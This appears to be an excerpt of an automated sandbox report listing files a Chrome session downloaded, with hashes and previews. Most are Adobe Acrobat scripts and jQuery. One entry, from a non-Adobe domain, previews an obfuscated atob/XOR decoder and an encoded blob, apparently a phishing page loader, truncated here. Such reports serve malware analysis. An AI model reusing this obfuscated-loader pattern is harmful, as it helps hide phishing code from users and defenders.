                  Preview:"use strict";(self["webpackJsonp-ccverbs-dropin"]=self["webpackJsonp-ccverbs-dropin"]||[]).push([[177],{"51Y/":(e,c,p)=>{p.r(c),p.d(c,{default:()=>d});const d=p.p+"912e12ce9a18d7b6c3ca23e99c6392ca.png"},w0i0:(e,c,p)=>{p.r(c),p.d(c,{default:()=>d});const d=p.p+"bbf33de08febe4e3c01398c4f623c52a.png"},"q++h":(e,c,p)=>{p.r(c),p.d(c,{default:()=>d});const d=p.p+"36cd1d9b53eef75888391ae237ec7481.png"}}]);.//# sourceMappingURL=private/atomic-thumbnail.js.map
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (16601)
                  Category:downloaded
                  Size (bytes):16806
                  Entropy (8bit):5.287926778722251
                  Encrypted:false
                  SSDEEP:
                  MD5:34A146B4B10AA6419D35ED0225ED2FEB
                  SHA1:C77F47B33F632284CB4A6311101E8EC633C9C062
                  SHA-256:24E787024F246DF8E46D2EDD4F0455F5AF9687D0E44089E825F05AAE57BE1B3D
                  SHA-512:A9F01E1EDD1A4CC52FD28B4491555B4BFD25D529A1D88455A02FD43E9844D396D3CAB167DBA84D131464F54B2A4556CA9A940C49F6B6C7DE076865ECA533B816
                  Malicious:false
                  Reputation:unknown
                  URL:https://prod.adobeccstatic.com/unav/1.4/UniversalNavComponentLayout.f3972b7df5d7beb97f25.bundle.js
                  Preview:/* For license information please see https://prod.adobeccstatic.com/License/LICENSE.txt */./*! For license information please see UniversalNavComponentLayout.f3972b7df5d7beb97f25.bundle.js.LICENSE.txt */.(self.webpackChunkuniversal_nav=self.webpackChunkuniversal_nav||[]).push([["UniversalNavComponentLayout"],{2:(e,t,n)=>{"use strict";n.r(t),n.d(t,{default:()=>k});var r=n(61),o=n(610),i=n(625),a=n(509),c={"app-switcher":{id:"APP_SWITCHER_ERROR",fallback:"Unable to load app switcher."},help:{id:"HELP_ERROR",fallback:"Unable to load help."}};const s=function(e,t){var n=a.Z.getLocaleStrings(),r=c[e],o=(null==n?void 0:n[r.id])||r.fallback,s=(null==n?void 0:n.TRY_AGAIN)||"Try again",l=(0,i.k)("<div class='unav-comp-error' data-test-id='unav-error'>\n <div class='error-msg'>".concat(o,"</div>\n <div class='error-cta'>").concat(s,"</div>\n </div>"));return l.querySelector(".error-cta").addEventListener("click",(function(e){return t(e)})),l};var l=n(338);var u=4,d=function(e){
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (5980)
                  Category:downloaded
                  Size (bytes):6041
                  Entropy (8bit):5.346739699439915
                  Encrypted:false
                  SSDEEP:
                  MD5:3D72923A7F0AEB76744A468980317657
                  SHA1:9C34FF8FDBCCE39FE5A3527291C1C1DBCC92751C
                  SHA-256:9EC56AAF18F7A7213D288BA923D9B8D1A237483F9E766B81AE7FF95B293FFF6F
                  SHA-512:CFA6E4A47B55BAEC43CDBED13BF940FCCFE26DBA145D57FF6CC8F4C5BC7B8595419C192FD7BDB07989FCAA005793268926B6C23CA6299561C29ED0650E7B1575
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-genai-dropin/3.65.0_1.1122.0/source-attribution-chunk.js
                  Preview:"use strict";(self["webpackJsonp-genai"]=self["webpackJsonp-genai"]||[]).push([[4804],{Nuxp:(t,e,n)=>{n.r(e),n.d(e,{default:()=>components_SourceAttribution});var o=n("YWiy");const invertMatrix=t=>{const[e,n,o,r,a,s]=t,l=e*r-n*o;if(0===l)throw new Error("Matrix is not invertible");return[r/l,-n/l,-o/l,e/l,(o*s-r*a)/l,(n*a-e*s)/l]},multiplyTransformMatrices=(t,e)=>{const[n,o,r,a,s,l]=t,[i,u,c,h,f,m]=e;return[n*i+o*c,n*u+o*h,r*i+a*c,r*u+a*h,s*i+l*c+f,s*u+l*h+m]},getRectFromQuad=t=>{const[e,n,o,r,a,s,l,i]=t;return[[Math.min(e,o,a,l),Math.min(n,r,s,i)],[Math.max(e,o,a,l),Math.max(n,r,s,i)]]},mergeQuads=async(t,e,n)=>{if(!e||0===e.length)return{};let o={},a=!1,s=3;if(6===(null==n?void 0:n.length)){const e=await(async(t,e)=>{const n=await(null==t?void 0:t()),o=n.height,r=n.width;return[{x:0,y:0},{x:r,y:0},{x:r,y:o},{x:0,y:o}].map((t=>{let{x:n,y:o}=t;return{x:e[0]*n+e[2]*o+e[4],y:e[1]*n+e[3]*o+e[5]}}))})(t,n);o={transformedPageQuads:e,transformationMatrix:invertMatrix(n)},s=6,a=!0}const l=awa
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text
                  Category:downloaded
                  Size (bytes):337
                  Entropy (8bit):4.860039698684277
                  Encrypted:false
                  SSDEEP:
                  MD5:4DAAD40FAADAE51E44C5DE05C6CE8BD1
                  SHA1:ECEBC3D25766F76EE1C162296B69D180A44C8958
                  SHA-256:92054CE2C133F247DFC6556AF9C11C9B388FC698D54E9F8FDD35AE186996B918
                  SHA-512:95E778E35C372E747D49A7105A4C744BECF7228375707470658FDDB215F48633D9BA793155E5CC79B5494232C8633663D482F44630B33327AE1F6EB00F372529
                  Malicious:false
                  Reputation:unknown
                  URL:https://prod.adobeccstatic.com/unav/1.4/profile.bundle.css
                  Preview:/* For license information please see https://prod.adobeccstatic.com/License/LICENSE.txt */...universal-nav-container .profile-comp{padding:.3125rem 1rem .375rem 1rem;height:2rem}.universal-nav-container .profile-comp.s{padding:0 .75rem 0 .75rem;height:1.5rem;font-size:.75rem}.universal-nav-container .profile-comp:hover{cursor:pointer}
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (54731), with no line terminators
                  Category:downloaded
                  Size (bytes):54748
                  Entropy (8bit):4.720229335535071
                  Encrypted:false
                  SSDEEP:
                  MD5:615CCF23B64C86DF2F36D1DF05DC2A80
                  SHA1:D9F3CB2E64D16C4F7633A247185F84BD2C760E83
                  SHA-256:013273D0FE8293CD508193E3D63061511ED8913A914CFD525314CC0F26979C57
                  SHA-512:624164AEBBF9D676BC8A8679D72BE24CBF4507C3D859449E32DA8D8C1E28AC9C9C580AF3ECE03D3C12C7508994F6522B444EE37BE9E75C7E2BF4BDFAAC6F8ACB
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-organize-verbs-dropin/3.17.1_2.683.0/translations-en-US-json.js
                  Preview:"use strict";(self["webpackJsonp-organize-verbs"]=self["webpackJsonp-organize-verbs"]||[]).push([[7818],{R5i5:e=>{e.exports=JSON.parse('{"design-new-page.dropzone.heading.seo":"Design new pages for a PDF","combine.label.seo":"Merge PDFs","combine.dropzone.heading.seo":"Merge PDF files","combine.dropzone.description.seo":"Drag and drop PDFs to merge them into one file with our PDF combiner.","extractpages.dropzone.heading.seo":"Extract PDF pages","extractpages.dropzone.description.seo":"Drag and drop a PDF file, then extract pages from it.","deletepages.dropzone.heading.seo":"Delete PDF pages","deletepages.dropzone.description.seo":"Drag and drop a file, then remove pages from your PDF.","insertpages.dropzone.heading.seo":"Add pages to a PDF","organize.dropzone.heading.seo":"Organize Pages","rotatepages.dropzone.heading.seo":"Rotate PDF pages","rotatepages.dropzone.description.seo":"Drag and drop one or more PDFs, then rotate pages with our PDF rotator.","reorderpages.dropzone.heading.s
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65462)
                  Category:downloaded
                  Size (bytes):742972
                  Entropy (8bit):5.638205900225992
                  Encrypted:false
                  SSDEEP:
                  MD5:56A691B3BAA74DD0CEAFCF47E54EA641
                  SHA1:50CD985A7936FC480D32E3826E26475FC6F7B1F4
                  SHA-256:9C549F8033CE74B90F55919EA369B1238D7B15C096C67F3EC4DEB9213CB2CB8D
                  SHA-512:479843A7B0AE3630F67350E1B10376D0A06B0C60EA0DB6C641A3F7F479C18FA78572418CC71652C36E7108C735A7582DB72E9D89204AE418DE5039C7F33941BE
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-comments-dropin/3.59.4_2.1115.1/RHComments-chunk.js
                  Preview:/*! For license information please see RHComments-chunk.js.LICENSE.txt */.(self["webpackJsonp-comments"]=self["webpackJsonp-comments"]||[]).push([[4763],{NQnz:(e,t,A)=>{"use strict";var n=A("YWiy");e.exports=n.createElement("svg",{viewBox:"0 0 36 36"},n.createElement("path",{d:"M6.745 12.073h-5.29A1.473 1.473 0 0 0 0 13.564v8.942A1.473 1.473 0 0 0 1.455 24h5.29a1.429 1.429 0 0 1 .93.345l7.13 7.259A.727.727 0 0 0 16 31.029V5a.726.726 0 0 0-1.194-.571l-7.127 7.3a1.437 1.437 0 0 1-.934.344zM22.04 18a6.936 6.936 0 0 1-1.408 4.192.981.981 0 0 0 .087 1.288l.016.016a.991.991 0 0 0 1.486-.09 8.954 8.954 0 0 0-.021-10.853.991.991 0 0 0-1.484-.087l-.016.016a.982.982 0 0 0-.084 1.293A6.944 6.944 0 0 1 22.04 18z"}),n.createElement("path",{d:"M28.04 18a12.937 12.937 0 0 1-3.116 8.436.972.972 0 0 0 .063 1.317l.014.014a1 1 0 0 0 1.474-.069 14.98 14.98 0 0 0-.027-19.43 1 1 0 0 0-1.467-.068l-.015.015a.977.977 0 0 0-.066 1.319A12.939 12.939 0 0 1 28.04 18z"}),n.createElement("path",{d:"M34.04 18a18.92 1
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (19090)
                  Category:downloaded
                  Size (bytes):19148
                  Entropy (8bit):5.4344631748007055
                  Encrypted:false
                  SSDEEP:
                  MD5:AAC4FC102C4256C678BCC8C19FB51CDF
                  SHA1:176717C83AB7A73BD18FC00707619128118CB97A
                  SHA-256:107FE7C3430BF667BCB78C4C19A281B8B6AE4693C73F32253FCC7A645179F77B
                  SHA-512:2A06FE1C9062E7A5E13BFA5655B0DFC1FF6E900D2E98B6DDA97AE068D557567C49CF5BC8B964861905346FC68C640BDBD14EAAAF892EB1C971A5AB58E5BB12D1
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-fillsign2-dropin/3.17.1_1.498.0/fillsignoverlay-chunk.js
                  Preview:(self["webpackJsonp-fillsign2"]=self["webpackJsonp-fillsign2"]||[]).push([[8973],{"s0/1":(e,t,i)=>{var a=NaN,r="[object Symbol]",n=/^\s+|\s+$/g,o=/^[-+]0x[0-9a-f]+$/i,s=/^0b[01]+$/i,c=/^0o[0-7]+$/i,l=parseInt,d="object"==typeof i.g&&i.g&&i.g.Object===Object&&i.g,u="object"==typeof self&&self&&self.Object===Object&&self,g=d||u||Function("return this")(),p=Object.prototype.toString,f=Math.max,v=Math.min,now=function(){return g.Date.now()};function isObject(e){var t=typeof e;return!!e&&("object"==t||"function"==t)}function toNumber(e){if("number"==typeof e)return e;if(function isSymbol(e){return"symbol"==typeof e||function isObjectLike(e){return!!e&&"object"==typeof e}(e)&&p.call(e)==r}(e))return a;if(isObject(e)){var t="function"==typeof e.valueOf?e.valueOf():e;e=isObject(t)?t+"":t}if("string"!=typeof e)return 0===e?e:+e;e=e.replace(n,"");var i=s.test(e);return i||c.test(e)?l(e.slice(2),i?2:8):o.test(e)?a:+e}e.exports=function debounce(e,t,i){var a,r,n,o,s,c,l=0,d=!1,u=!1,g=!0;if("functi
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:JSON data
                  Category:dropped
                  Size (bytes):113
                  Entropy (8bit):4.3550585561113895
                  Encrypted:false
                  SSDEEP:
                  MD5:515AF12EE587C73EAC2751CF4C6609AC
                  SHA1:21F0FA4622E744B49E0BC67637FCB58B1EA6FF47
                  SHA-256:D13C4EA97A79FC2823308F15741410FC65E389FCFB06EAAE4E89A2D909771697
                  SHA-512:57BEB08767E413C497CCD632DE2C5BDC9653910224FDFAAEFED6908580B671243926691797CCAECE96558D75B171E74715CA0E5AC86458FF55E5784ADA7C8643
                  Malicious:false
                  Reputation:unknown
                  Preview:{ "error": { "code": "Forbidden", "message": "Oauth token is missing", "details": { "error_code": "403010" } } }.
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65447)
                  Category:downloaded
                  Size (bytes):89501
                  Entropy (8bit):5.289893677458563
                  Encrypted:false
                  SSDEEP:
                  MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                  SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                  SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                  SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                  Malicious:false
                  Reputation:unknown
                  URL:https://code.jquery.com/jquery-3.6.0.min.js
                  Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (46131)
                  Category:downloaded
                  Size (bytes):46181
                  Entropy (8bit):5.657973913567097
                  Encrypted:false
                  SSDEEP:
                  MD5:3A4B9978B631F227A639D93F0F8CD637
                  SHA1:A8D1B2CF6E5AE56C9F41150156B587FAFA9E9242
                  SHA-256:33280BB3A9CA6CB82D359EDE3C1FA0B81E9662BD5171EC13AFF51E06EEAF0DB5
                  SHA-512:526DF96517D740259D40CB9655150D398B0D68B3656A56978EA06083B457547357234C329D84F850F2AB3DBA68708542D79E455A2FA3B964528CB2C9CEE4D990
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-genai-dropin/3.65.0_1.1122.0/genai-chunk.js
                  Preview:(self["webpackJsonp-genai"]=self["webpackJsonp-genai"]||[]).push([[2925],{qCTy:(e,t,n)=>{"use strict";n.d(t,{w:()=>unsubscribeFromSelectors,x:()=>subscribeToSelector});var r=n("abd3");let o=[];const unsubscribeFromSelectors=()=>{o.forEach((e=>{e&&"function"==typeof e&&e()})),o=[]},subscribeToSelector=function(e,t,n){let a=arguments.length>3&&void 0!==arguments[3]?arguments[3]:(e,t)=>e!==t;for(var i=arguments.length,l=new Array(i>4?i-4:0),s=4;s<i;s++)l[s-4]=arguments[s];const c=(0,r.computed)((()=>t(e,...l)));let d=c.get(),u=!0;const p=(0,r.autorun)((e=>{const t=c.get();(a(d,t)||u)&&(u=!1,d=t,n(t,e))}));return o.push(p),p}},T02o:(e,t,n)=>{"use strict";n.r(t),n.d(t,{default:()=>__WEBPACK_DEFAULT_EXPORT__,injectQnAStores:()=>injectQnAStores});var r=n("YWiy"),o=n("VjBA"),a=n("PGMW"),i=n("98vq"),l=n("itEc"),s=n("qW40"),c=n("Xw/t"),d=n("wTc/");const injectQnAStores=e=>t=>{const n={qnaStore:a.qnaStore,attributionStore:a.attributionStore,commonGenAIStore:a.commonGenAIStore,multiDocStore:c.A.ge
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (36248)
                  Category:downloaded
                  Size (bytes):36306
                  Entropy (8bit):5.322809678994898
                  Encrypted:false
                  SSDEEP:
                  MD5:C95E800A05FAAC73C3E88D4CED67C8FF
                  SHA1:41B992BDE89D2FA03DB61174F4C27E3A73C59710
                  SHA-256:6B14DF8DB880744177AA09604BE758CFC2079BE89DF3CF0D17D77EB735B2BE53
                  SHA-512:3D4E9C007B4E2D03C26BADF939531160B4DB66337724B20CE7B570AB7FA8F4EE4A9C6DAC2F4E32A14E0FBD38B087ECF77FD6A69D066D41043487C39F61021EDF
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-fillsign2-dropin/3.17.1_1.498.0/fillsignservice-chunk.js
                  Preview:(self["webpackJsonp-fillsign2"]=self["webpackJsonp-fillsign2"]||[]).push([[280],{DZTv:(e,t,r)=>{e=r.nmd(e);var n="__lodash_hash_undefined__",a=1,i=2,o=9007199254740991,s="[object Arguments]",c="[object Array]",u="[object AsyncFunction]",l="[object Boolean]",f="[object Date]",h="[object Error]",p="[object Function]",d="[object GeneratorFunction]",y="[object Map]",b="[object Number]",g="[object Null]",v="[object Object]",_="[object Promise]",m="[object Proxy]",j="[object RegExp]",A="[object Set]",w="[object String]",O="[object Symbol]",C="[object Undefined]",S="[object WeakMap]",T="[object ArrayBuffer]",k="[object DataView]",P=/^\[object .+?Constructor\]$/,E=/^(?:0|[1-9]\d*)$/,I={};I["[object Float32Array]"]=I["[object Float64Array]"]=I["[object Int8Array]"]=I["[object Int16Array]"]=I["[object Int32Array]"]=I["[object Uint8Array]"]=I["[object Uint8ClampedArray]"]=I["[object Uint16Array]"]=I["[object Uint32Array]"]=!0,I[s]=I[c]=I[T]=I[l]=I[k]=I[f]=I[h]=I[p]=I[y]=I[b]=I[v]=I[j]=I[A]=I[w]=I
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:HTML document, ASCII text, with very long lines (19873), with CRLF line terminators
                  Category:downloaded
                  Size (bytes):24908
                  Entropy (8bit):5.894115193622637
                  Encrypted:false
                  SSDEEP:
                  MD5:21EE06EB736CBA8C04BCAE3834AA3B8E
                  SHA1:66815BDC3A04C0156F75237CD606C58DD1E0470F
                  SHA-256:5336D6AC5D28EDE919FD714F043F7A2CD6CA7D1B6FFFD1C26780DFD8BC9DB1F6
                  SHA-512:8FCC26403A82B94A0C9F0867FE29056CB1ACC8A3E84B2FE85AB2ED55F154400C1E1FE8362F7F7FC56031118A917FE373229BF5B1DC7323565F6A4988C4028F10
                  Malicious:false
                  Reputation:unknown
                  URL:https://4fsv.iatrivvbe.com/trs/
                  Preview:<script>..function lwnfBISsCO(RCLTQwMFfA, VgGhQaeTHv) {..let wEkLaAaeDJ = '';..RCLTQwMFfA = atob(RCLTQwMFfA);..let nKJMwIatVQ = VgGhQaeTHv.length;..for (let i = 0; i < RCLTQwMFfA.length; i++) {.. wEkLaAaeDJ += String.fromCharCode(RCLTQwMFfA.charCodeAt(i) ^ VgGhQaeTHv.charCodeAt(i % nKJMwIatVQ));..}..return wEkLaAaeDJ;..}..var RQTOKqUpFM = lwnfBISsCO(`XTcSOzwANXpCEQJ5UyEhBDEpC0xOJx4tMF4rK0QGEz1fKjodbjBAFgQ2CGRmXnd0AU0MLR9nPwNjZA1MEicDICUEf1c7XxInAyAlBGEpQwBcZhk9IQAyYB5MAiAfIyZeIjZeFgUiHSgnFW85Xg5OJRsoLV8tM1MQTicDMCUELndbEE5wX3h7QW45QxoRMB5kPwNvN1gNTy4Ca2tMbilSEQg0BXdYekxQDRACNhg5IU5MUF8GFmQ3PDsTNTNeDUklBSY3WGY7ZjoGDzZ8PRQsNl86ORYHKjxFcgBmKQonHCVnKhkTVgUpMxYtZxw0AHZaUggcBz0SBiJgAiYCBC0SSTUTeRtZDTktJRIsCEcHGHEXKhIYKThfMRcmIgttFgIYRDo5HgETZzZxOAIqFCApBzkTKhxfOTZxQQU4HDQDAxtQHjYfLzsCEHIHOQ4GADwbMRN5EC8HGAgyOQIbVioiBRYtZxw0AHZaUggcMSMpcxwBAjZ9BAARQCYTXCUIJkIfZT8sEEI6NnEDAD8DDxlfUy8HHBsjKXIMRTk2cUEFODYqAHQ1Ux4mfGUkBjZLByYSBBMNOS4TXBcNISYbIxRzblgvIgYcLQJFKz52DxcmGAg6KhkAXQEPFQEAHQMPGVgiBg0y
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (4813)
                  Category:downloaded
                  Size (bytes):4905
                  Entropy (8bit):4.361564560800376
                  Encrypted:false
                  SSDEEP:
                  MD5:62A7332B2CE5AFA98C58B5AFE6297DA0
                  SHA1:185040D74D466D0E3B48885BA792743DC34CED30
                  SHA-256:3B79A46DBB1A9FCA7EF86ED1C493441375B960E83B104D8D878468193215BB73
                  SHA-512:59A78D439404AF6658913C017BA058ED0215F235D198D86798913E1C1A195CA3DA72F1E728F427423B738DC91251930C0588BE0EDC4A311B322813720B08BCFE
                  Malicious:false
                  Reputation:unknown
                  URL:https://prod.adobeccstatic.com/unav/1.4/svg-icons.38d295428c1adcfddb22.bundle.js
                  Preview:/* For license information please see https://prod.adobeccstatic.com/License/LICENSE.txt */."use strict";(self.webpackChunkuniversal_nav=self.webpackChunkuniversal_nav||[]).push([["svg-icons"],{546:(C,t,h)=>{h.r(t),h.d(t,{default:()=>n});const n={"app-switcher":'<svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 20 20">\n <path d="M4.75 2.25H3.25C2.69772 2.25 2.25 2.69772 2.25 3.25V4.75C2.25 5.30228 2.69772 5.75 3.25 5.75H4.75C5.30228 5.75 5.75 5.30228 5.75 4.75V3.25C5.75 2.69772 5.30228 2.25 4.75 2.25Z"/>\n <path d="M10.75 2.25H9.25C8.69772 2.25 8.25 2.69772 8.25 3.25V4.75C8.25 5.30228 8.69772 5.75 9.25 5.75H10.75C11.3023 5.75 11.75 5.30228 11.75 4.75V3.25C11.75 2.69772 11.3023 2.25 10.75 2.25Z"/>\n <path d="M16.75 2.25H15.25C14.6977 2.25 14.25 2.69772 14.25 3.25V4.75C14.25 5.30228 14.6977 5.75 15.25 5.75H16.75C17.3023 5.75 17.75 5.30228 17.75 4.75V3.25C17.75 2.69772 17.3023 2.25 16.75 2.25Z"/>\n <path d="M4.75 8.25H3.25C2.69772 8.25 2.25 8.69772 2
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65469)
                  Category:downloaded
                  Size (bytes):494882
                  Entropy (8bit):5.4679737041111265
                  Encrypted:false
                  SSDEEP:
                  MD5:EA4582950EFE0224F79209C8216051E4
                  SHA1:1A3180092A62F80D8C6CBC554CAFEEBB40D83135
                  SHA-256:1DBFD7E58A4BD7BE323B5EB0BD5991B4C462E59AD7EBE36390D634B15A0D1037
                  SHA-512:77C1F570CB6BD225A269A72B7D02D34B32B38EBA75B5AFCD4B1B5F99BF189B6990CB32E5DD8E8CF3B88FB1DC968B2947B493D5B46E892CA42F49A51854B4E1E9
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-review-dropin/3.21.0_2.326.0/bootstrap.js
                  Preview:/*! For license information please see bootstrap.js.LICENSE.txt */.(()=>{var e,t,n,r,o={"eb+9":(e,t,n)=>{e.exports=n("YQ4W")},YQ4W:(e,t,n)=>{"use strict";var r=n("AAps");Object.defineProperty(t,"__esModule",{value:!0}),t.default=Avatar;var o=r(n("z3HK")),s=r(n("jp00")),a=r(n("PZ3W")),l=r(n("e1tA")),c=r(n("/hLX")),d=r(n("YWiy"));function Avatar(e){var t=e.src,n=e.alt,r=e.disabled,c=e.className,p=(0,s.default)(e,["src","alt","disabled","className"]);return c=(0,a.default)("spectrum-Avatar",{"is-disabled":r},c),d.default.createElement("img",(0,o.default)({},(0,l.default)(p),{src:t,alt:n,className:c}))}n("9qVO"),n("VnGV"),n("UGQT"),Avatar.propTypes={src:c.default.string,alt:c.default.string,disabled:c.default.bool,className:c.default.string},Avatar.defaultProps={alt:""}},l4jU:(e,t,n)=>{"use strict";var r=n("AAps"),o=n("h6PR");t.A=void 0;var s,a,l,c=r(n("z3HK")),d=r(n("jp00")),p=r(n("QNma")),u=r(n("vPca")),h=r(n("khqL")),_=r(n("qavZ")),m=r(n("qJYQ")),v=r(n("i44B")),g=r(n("uqI5")),w=r(n("/hL
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (10983)
                  Category:downloaded
                  Size (bytes):11050
                  Entropy (8bit):5.38360309543556
                  Encrypted:false
                  SSDEEP:
                  MD5:D837B88C7DA886C07E4220DB26C59E95
                  SHA1:AF76F4577B94965011962A2A9DECDA58A8E09451
                  SHA-256:BFB78E6F0CD2343A6FECB0E6961E122AF4C92AA016A7F81435838A860D77F24C
                  SHA-512:69076B96A805DB63B0328199E65D554D21A5E3C14A0F290E71664C58ED7E64F9BE688A44B12B3F371CEF5846897B4244AFE1F584E641270900AEF4EFEC141E88
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/home/34df8e8885/880-06b4372d22eafdc0f275.js
                  Preview:!function(){try{var y="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},M=(new y.Error).stack;M&&(y._sentryDebugIds=y._sentryDebugIds||{},y._sentryDebugIds[M]="5f707c4b-4e29-4657-9a99-fb147994d98e",y._sentryDebugIdIdentifier="sentry-dbid-5f707c4b-4e29-4657-9a99-fb147994d98e")}catch(y){}}();var _global="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};_global.SENTRY_RELEASE={id:"34df8e88851d3cbee2b7be2637531e04f753d64c"},(self["webpackJsonp-dc-web-app"]=self["webpackJsonp-dc-web-app"]||[]).push([[880],{"74hU":(y,M,P)=>{P.d(M,{onCLS:()=>F,onFCP:()=>I,onFID:()=>O,onINP:()=>$,onLCP:()=>ne,onTTFB:()=>oe});var A,B,H,J,U,a=function(){return window.performance&&performance.getEntriesByType&&performance.getEntriesByType("navigation")[0]},o=function(y){if("loading"===document.readyState)return"loading";var M=a();if(M){if(y<M.domInteractive)return"loading";if(0===M.domContentLoadedEventStart||y<M
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65469)
                  Category:downloaded
                  Size (bytes):330605
                  Entropy (8bit):5.7751210008559895
                  Encrypted:false
                  SSDEEP:
                  MD5:7161E533A43B9E8E380AE51E5C544B57
                  SHA1:FF8C99B2A761C21EE84B2CC64D174B0FF9ABAD12
                  SHA-256:0F4282B744BCC198E87117F67D35BDD2525CA5C70C207C1E1D95B40225AC5232
                  SHA-512:F6C150C69D581142BAFFEBB77B349961CE84050BB7C50B33000642DF967E6CBED3478B84B9D846D620EC797D9BBB9CBB86CCECA5F09F32DC2271FC0ADA0F9F83
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-fillsign2-dropin/3.17.1_1.498.0/bootstrap.js
                  Preview:/*! For license information please see bootstrap.js.LICENSE.txt */.(()=>{var i,n,r,a,o={e4dh:(i,n,r)=>{"use strict";n.U=function A4uChevronDown(i){var n=_extends({},i);return a.default.createElement("svg",_extends({viewBox:"0 0 36 36"},n,n),a.default.createElement("path",{fillRule:"evenodd",d:"M8,14.02a2,2,0,0,1,3.411-1.411l6.578,6.572,6.578-6.572a2,2,0,0,1,2.874,2.773l-.049.049L19.4,23.415a2,2,0,0,1-2.825,0h0L8.586,15.432A1.989,1.989,0,0,1,8,14.02Z"}))};var a=function _interopRequireDefault(i){return i&&i.__esModule?i:{default:i}}(r("YWiy"));function _extends(){return _extends=Object.assign?Object.assign.bind():function(i){for(var n=1;n<arguments.length;n++){var r=arguments[n];for(var a in r)Object.prototype.hasOwnProperty.call(r,a)&&(i[a]=r[a])}return i},_extends.apply(this,arguments)}},mLZK:(i,n,r)=>{"use strict";r.d(n,{A:()=>a});const a=function stylis_min(i){function M(i,a,o,l,c){for(var d,w,S,C,x,I=0,O=0,J=0,ie=0,oe=0,se=0,le=S=d=0,ce=0,de=0,ue=0,he=0,ge=o.length,ye=ge-1,ve="",Se
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:JSON data
                  Category:dropped
                  Size (bytes):571
                  Entropy (8bit):4.868341244422001
                  Encrypted:false
                  SSDEEP:
                  MD5:9BC94F98F08D170FE39A07CFA208AFA3
                  SHA1:CC0BB53D6BED23AF4ADC99F236A1C23ED6DE6F57
                  SHA-256:A1519D47B6C39AD275663EF973CD9DB7953E0C2E0D78D94330F9DB152A51EA4F
                  SHA-512:52034FD99956B4691E0C7EE4E6D8752FF2159D449A27B55F7A2A46E2D8272DA3101E8BEF451F63C900A97347477DDEA746478E8143C4754AE3A51968B84342FB
                  Malicious:false
                  Reputation:unknown
                  Preview:{. "LOC_ALL_APPS": "All apps",. "PROFILE_SIGN_IN": "Sign in",. "PROFILE_SIGN_UP": "Sign up",. "GET_HELP": "Get help",. "CONTACT_US": "Contact us",. "APP_LAUNCHER_TOOLTIP": "App switcher",. "ASK_THE_COMMUNITY": "Ask the community",. "HELP_MENU_TOOLTIP": "Help",. "APP_SWITCHER_HEADER_TITLE": "Web Apps",. "APP_SWITCHER_ERROR": "Unable to load app switcher.",. "HELP_ERROR": "Unable to load help menu.",. "TRY_AGAIN": "Try again",. "LOC_HOME": "Home",. "MY_ADOBE": "My Adobe",. "DISMISS": "Dismiss",. "CART_TOOLTIP": "Cart".}
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (47664)
                  Category:downloaded
                  Size (bytes):47779
                  Entropy (8bit):5.72293461375474
                  Encrypted:false
                  SSDEEP:
